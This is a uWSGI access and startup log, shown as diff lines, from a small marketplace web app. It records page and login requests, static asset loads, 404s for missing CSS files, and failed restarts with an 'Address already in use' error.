+[pid: 661|app: 0|req: 1621/2020] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:39 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1622/2021] 219.228.146.135 () {42 vars in 976 bytes} [Thu Jan 14 11:16:55 2021] GET /ownpublish-0-0-0 => generated 9472 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2022] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 11:16:55 2021] GET /static/img/favicon.ico => generated 1150 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1623/2023] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 11:17:04 2021] GET /ownpublish-0-0-0 => generated 9472 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /
+[pid: 661|app: 0|req: 1624/2024] 219.228.146.135 () {38 vars in 853 bytes} [Thu Jan 14 11:17:11 2021] GET / => generated 3429 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1625/2025] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:17:16 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1626/2026] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:17:17 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1627/2027] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:17:27 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1628/2028] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:17:27 2021] GET /home/ => generated 8984 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1629/2029] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:17:32 2021] GET /all-0-0-0 => generated 9887 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2030] 219.228.146.135 () {38 vars in 850 bytes} [Thu Jan 14 11:17:32 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1630/2031] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:17:37 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1631/2032] 180.160.49.168 () {40 vars in 884 bytes} [Thu Jan 14 11:17:39 2021] GET /home/ => generated 8998 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 19:19:27 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-8-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /www/wwwroot/master
+detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 3874
+your memory page size is 4096 bytes
+detected max file descriptor number: 100001
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+probably another instance of uWSGI is running on the same address (0.0.0.0:8000).
+bind(): Address already in use [core/socket.c line 769]
+[pid: 661|app: 0|req: 1632/2033] 219.228.146.135 () {42 vars in 951 bytes} [Thu Jan 14 11:19:42 2021] GET /all-0-0-0 => generated 9887 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2034] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:19:43 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: -1|req: -1/2035] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:19:43 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 1633/2036] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:19:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1634/2037] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:20:01 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1635/2038] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:20:01 2021] GET /home/ => generated 8984 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1636/2039] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:20:04 2021] GET /all-0-0-0 => generated 9887 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1637/2040] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 11:20:12 2021] GET /all-0-0-0 => generated 9887 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 19:21:49 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-8-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /www/wwwroot/master
+detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 3874
+your memory page size is 4096 bytes
+detected max file descriptor number: 100001
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+probably another instance of uWSGI is running on the same address (0.0.0.0:8000).
+bind(): Address already in use [core/socket.c line 769]
+[pid: 661|app: 0|req: 1638/2041] 219.228.146.135 () {42 vars in 955 bytes} [Thu Jan 14 11:21:53 2021] GET /all-0-0-0 => generated 9887 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2042] 219.228.146.135 () {42 vars in 883 bytes} [Thu Jan 14 11:21:53 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1639/2043] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:21:56 2021] GET /ownpublish-0-0-0 => generated 9303 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1640/2044] 219.228.146.135 () {40 vars in 931 bytes} [Thu Jan 14 11:21:59 2021] GET /all-0-0-0 => generated 9887 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1641/2045] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 11:22:08 2021] GET /all-0-0-0 => generated 9901 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2046] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:22:08 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 1642/2047] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:22:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2048] 219.228.146.135 () {40 vars in 867 bytes} [Thu Jan 14 11:22:08 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: -1|req: -1/2049] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 11:22:08 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[]
+[pid: 661|app: 0|req: 1643/2050] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:22:17 2021] GET /all-3-0-0 => generated 9085 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1644/2051] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:22:19 2021] GET /all-0-0-0 => generated 9901 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1645/2052] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:22:19 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1646/2053] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:22:19 2021] GET /home/ => generated 8984 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1647/2054] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:22:22 2021] GET /all-0-0-0 => generated 9887 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2055] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:22:23 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1648/2056] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 11:23:38 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1649/2057] 180.160.49.168 () {48 vars in 959 bytes} [Thu Jan 14 11:24:02 2021] POST /login/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1650/2058] 180.160.49.168 () {40 vars in 873 bytes} [Thu Jan 14 11:24:02 2021] GET /home/ => generated 9007 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1651/2059] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 11:24:05 2021] GET /publish/ => generated 5234 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+旧书低价出售:高等数学 全套只要20
+[pid: 661|app: 0|req: 1652/2060] 180.160.49.168 () {48 vars in 1064 bytes} [Thu Jan 14 11:26:51 2021] POST /publish/ => generated 0 bytes in 205 msecs (HTTP/1.1 302) 7 headers in 202 bytes (60 switches on core 1)
+[pid: 661|app: 0|req: 1653/2061] 180.160.49.168 () {42 vars in 913 bytes} [Thu Jan 14 11:26:51 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1654/2062] 180.160.49.168 () {42 vars in 915 bytes} [Thu Jan 14 11:26:51 2021] GET /single/4/ => generated 9430 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2063] 180.160.49.168 () {38 vars in 805 bytes} [Thu Jan 14 11:26:51 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 1655/2064] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:26:56 2021] GET /all-0-0-0 => generated 10303 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2065] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:26:56 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2066] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:26:56 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1656/2067] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:27:05 2021] GET /single/4/ => generated 9430 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2068] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:27:05 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /
+[pid: 661|app: 0|req: 1657/2069] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 11:27:31 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1658/2070] 219.228.146.135 () {40 vars in 902 bytes} [Thu Jan 14 11:33:11 2021] GET /all-0-0-0 => generated 10473 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2071] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 11:33:11 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2072] 219.228.146.135 () {38 vars in 844 bytes} [Thu Jan 14 11:33:11 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1659/2073] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:33:20 2021] GET /ownpublish-0-0-0 => generated 9430 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1660/2074] 219.228.146.135 () {42 vars in 969 bytes} [Thu Jan 14 11:33:24 2021] GET /ownpublish-0-0-0 => generated 9430 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2075] 219.228.146.135 () {42 vars in 890 bytes} [Thu Jan 14 11:33:24 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1661/2076] 219.228.146.135 () {38 vars in 865 bytes} [Thu Jan 14 11:35:08 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1662/2077] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 11:35:19 2021] POST /login/ => generated 27 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1663/2078] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 11:35:19 2021] GET /home/ => generated 8984 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1664/2079] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:35:22 2021] GET /all-0-0-0 => generated 10473 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2080] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 11:35:23 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: -1|req: -1/2081] 219.228.146.135 () {40 vars in 863 bytes} [Thu Jan 14 11:35:23 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: -1|req: -1/2082] 219.228.146.135 () {40 vars in 899 bytes} [Thu Jan 14 11:35:23 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 1665/2083] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:14 2021] GET /all-0-0-0 => generated 10496 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2084] 180.160.49.168 () {40 vars in 818 bytes} [Thu Jan 14 11:36:14 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2085] 180.160.49.168 () {40 vars in 826 bytes} [Thu Jan 14 11:36:14 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2086] 180.160.49.168 () {40 vars in 801 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2087] 180.160.49.168 () {40 vars in 799 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2088] 180.160.49.168 () {40 vars in 807 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2089] 180.160.49.168 () {40 vars in 817 bytes} [Thu Jan 14 11:36:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2090] 180.160.49.168 () {40 vars in 858 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2091] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2092] 180.160.49.168 () {40 vars in 860 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2093] 180.160.49.168 () {40 vars in 869 bytes} [Thu Jan 14 11:36:14 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1666/2094] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 11:36:22 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2095] 180.160.49.168 () {40 vars in 814 bytes} [Thu Jan 14 11:36:22 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 1667/2096] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:34 2021] GET /single/1/ => generated 9451 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2097] 180.160.49.168 () {40 vars in 840 bytes} [Thu Jan 14 11:36:34 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2098] 180.160.49.168 () {40 vars in 822 bytes} [Thu Jan 14 11:36:35 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2099] 180.160.49.168 () {40 vars in 846 bytes} [Thu Jan 14 11:36:35 2021] GET /static/img/dianzan.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2100] 180.160.49.168 () {40 vars in 875 bytes} [Thu Jan 14 11:36:37 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1668/2101] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:39 2021] GET /single/2/ => generated 9552 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1669/2102] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:36:43 2021] GET /single/4/ => generated 9430 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1670/2103] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 11:37:12 2021] GET /publish/ => generated 5234 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1671/2104] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:37:15 2021] GET /home/ => generated 9007 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2105] 180.160.49.168 () {40 vars in 816 bytes} [Thu Jan 14 11:37:15 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1672/2106] 180.160.49.168 () {40 vars in 875 bytes} [Thu Jan 14 11:37:21 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1673/2107] 180.160.49.168 () {40 vars in 882 bytes} [Thu Jan 14 11:37:22 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1674/2108] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:37:26 2021] POST /my-admin/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1675/2109] 180.160.49.168 () {40 vars in 889 bytes} [Thu Jan 14 11:37:26 2021] GET /admin-home/ => generated 11262 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2110] 180.160.49.168 () {40 vars in 878 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2111] 180.160.49.168 () {40 vars in 812 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2112] 180.160.49.168 () {40 vars in 841 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2113] 180.160.49.168 () {40 vars in 824 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2114] 180.160.49.168 () {40 vars in 853 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2115] 180.160.49.168 () {40 vars in 859 bytes} [Thu Jan 14 11:37:26 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 661|app: 0|req: 1676/2116] 180.160.49.168 () {38 vars in 836 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 661|app: 0|req: 1677/2117] 180.160.49.168 () {38 vars in 840 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 661|app: 0|req: 1678/2118] 180.160.49.168 () {38 vars in 804 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 661|app: 0|req: 1679/2119] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 661|app: 0|req: 1680/2120] 180.160.49.168 () {38 vars in 824 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 661|app: 0|req: 1681/2121] 180.160.49.168 () {38 vars in 880 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 661|app: 0|req: 1682/2122] 180.160.49.168 () {38 vars in 770 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 661|app: 0|req: 1683/2123] 180.160.49.168 () {38 vars in 772 bytes} [Thu Jan 14 11:37:26 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 661|app: 0|req: 1684/2124] 180.160.49.168 () {38 vars in 848 bytes} [Thu Jan 14 11:37:26 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
